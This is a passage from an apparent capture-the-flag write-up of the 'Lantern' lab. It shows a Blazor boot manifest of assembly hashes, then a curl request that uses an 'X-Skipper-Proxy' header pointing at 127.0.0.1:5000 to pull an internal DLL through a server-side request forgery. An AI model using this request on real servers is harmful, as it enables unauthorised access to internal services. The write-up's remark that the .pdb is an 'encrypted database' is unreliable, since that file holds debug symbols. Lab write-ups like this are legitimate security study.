"System.ServiceProcess.dll": "sha256-q9qiSJlSYsOOAiGL2eoKMB6tmGWJ0jiiiV03QkJj+9Y=",
"System.Text.Encoding.CodePages.dll": "sha256-h4c5zE7USMsMhnXdicO+QFRHhrSH00yG+o4hRoqmqsI=",
"System.Text.Encoding.Extensions.dll": "sha256-VKQUSIrhN95oGK0ZNOPersGZUsrV8OkM5B\/izDGHaeI=",
"System.Text.Encoding.dll": "sha256-cvkUmV\/SjtZC2SSfM3Z+P0+gbORa\/QUTnqYefItcMGo=",
"System.Text.Encodings.Web.dll": "sha256-eWzqi7I99oo4C6cURzIg\/VRsDO8GfDDg9BU7xHWhshI=",
"System.Text.Json.dll": "sha256-PNCDoNNxxyyeGxORbdIYh0kYj7UA+nLzlH+TzAjJtGU=",
"System.Text.RegularExpressions.dll": "sha256-qoZcnZH56UJS6ZNiULVv45neh+C5fylKYXWVVCBoVZI=",
"System.Threading.Channels.dll": "sha256-iVA9v1W3Kh8tsRVShEC5puyrQ5z8K8Jd9NG13NNGNcg=",
"System.Threading.Overlapped.dll": "sha256-4f7W3R6ayi71vj8Dx0V+b6LKWyBbWgXzIvYoVx6sB\/E=",
"System.Threading.Tasks.Dataflow.dll": "sha256-brkgW8gANJqDXLXZdLO\/4lBjsSI1ePj34x1ns3cfrew=",
"System.Threading.Tasks.Extensions.dll": "sha256-PENIL2r6939Zb5O7Fbd79vTqPJGtG7e4rZNo8t8GOpA=",
"System.Threading.Tasks.Parallel.dll": "sha256-O2W\/J4L8RL3MogHSrgHco2ZB00Q44wpJi59+l+RenbA=",
"System.Threading.Tasks.dll": "sha256-4DG5EctwgYdGf2XhwKU1V\/kDFo1zDwHRt+\/\/MlbxJIk=",
"System.Threading.Thread.dll": "sha256-Eu265Abl4uYVdiEC1SiBUm1CCZ7C+t\/wHqnKgtenUJc=",
"System.Threading.ThreadPool.dll": "sha256-eR1VbM1uBfWEvwE9103JLehTShaojDIfOzAEL3BRtek=",
"System.Threading.Timer.dll": "sha256-ohxHNOfivKoEfv6hFt3hRJrUrM7eRLPdX16pZ3sl40w=",
"System.Threading.dll": "sha256-PJukAfA8ombxR1eZIWeENQmv9cTirn98W+tMp9JcJN8=",
"System.Transactions.Local.dll": "sha256-kynD5I7qlEINTpHQAx9OCNHgDSG2MiaP7eKr5nE2ux0=",
"System.Transactions.dll": "sha256-8D1kOFTvSoOImIhguPn7hcE9jDscPMoiXNDmMkLIhZQ=",
"System.ValueTuple.dll": "sha256-oNAUfyqU\/GxYAN27YzGmESuB04CIUSWi\/d0X1whLjbE=",
"System.Web.HttpUtility.dll": "sha256-5J7arVRsJc4JnZXrXNijEu9GyuzstA7oWh5N+BcUgmE=",
"System.Web.dll": "sha256-jL2UY\/jFcH+aR4qy5E5D8aEpUPs0QUPeAen5UVcZyR8=",
"System.Windows.dll": "sha256-8bl48xmJJ3TBcL+t29aLb660\/zfuxABv0NlNswPdsXE=",
"System.Xml.Linq.dll": "sha256-PW5GMzZw4Kfb+PxHM\/3esXbvflMgxv2Gozi4c8r+KLA=",
"System.Xml.ReaderWriter.dll": "sha256-92YmEAsQ+w8VKPUIZtNcPiSJ17bjTPtT8PmsI8Q0sGI=",
"System.Xml.Serialization.dll": "sha256-YgESAq2VAp6Dm+Wp19D+FRkDgZk\/MZ3tJwB2SuRu7Xk=",
"System.Xml.XDocument.dll": "sha256-reoziM29CWZA9uIQMVdtm7s9yIQCuanDqA2ELdwILEs=",
"System.Xml.XPath.XDocument.dll": "sha256-yVwzItpv4vHQDwQCqM78Ydv2uHtSJYcZWJ1ZaRW\/ftc=",
"System.Xml.XPath.dll": "sha256-4axHEHFvTq1\/VzammSA38SdUn4qbE\/4070jr6gQHvco=",
"System.Xml.XmlDocument.dll": "sha256-S+Xk7z\/96t8ab30tKeYkqJi8fCecr7VDKhYGYUyWoTo=",
"System.Xml.XmlSerializer.dll": "sha256-8phryTFy1MDMCmjKD0tOs071P7GjND0DJdiSUZBpBPc=",
"System.Xml.dll": "sha256-Rg18wjp7\/BZHM0dC51OnrC39cUCu25BOS9+i8r7bUrM=",
"System.dll": "sha256-YKqpzE+7ICNb3IBWe6kXM+dCR18TTaRnThuOy6NLcG4=",
"WindowsBase.dll": "sha256-k04wZob3UNWysInC\/KRbcfiSMMSXDv56yL6raT6AnZk=",
"mscorlib.dll": "sha256-veli+XvWHzkA3s4t4DKI+XiyNMpfHQjiO002+ExANkU=",
"netstandard.dll": "sha256-O9JhHo5KqxkmwmapuxuhG\/iMRV7RHcrCDO9z+yv+8yI=",
"System.Private.CoreLib.dll": "sha256-6rKu8tPdUGsvbSpesoNMVzbx7bNqPRMPV34eI7vSYaQ=",
"InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
},
"extensions": null,
"lazyAssembly": null,
"libraryInitializers": null,
"pdb": {
"InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
},
"runtime": {
"dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
"icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
"icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
"icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
"icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
"dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
"dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
},
"satelliteResources": null
}
} Checking the blazor.boot.json file indeed lists out all the loaded packages and modules
2 files seems to stand out; InternaLantern.dll and InternaLantern.pdb
While the InternaLantern.pdb file appears to be an encrypted database, the InternaLantern.dll is a compiled binary for the internal web application
InternaLantern.dll
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i -s http://lantern.htb/_framework/InternaLantern.dll -H 'X-Skipper-Proxy: http://127.0.0.1:5000/' -o InternaLantern.dllDownloading the compiled binary I will decompile the binary to check the source code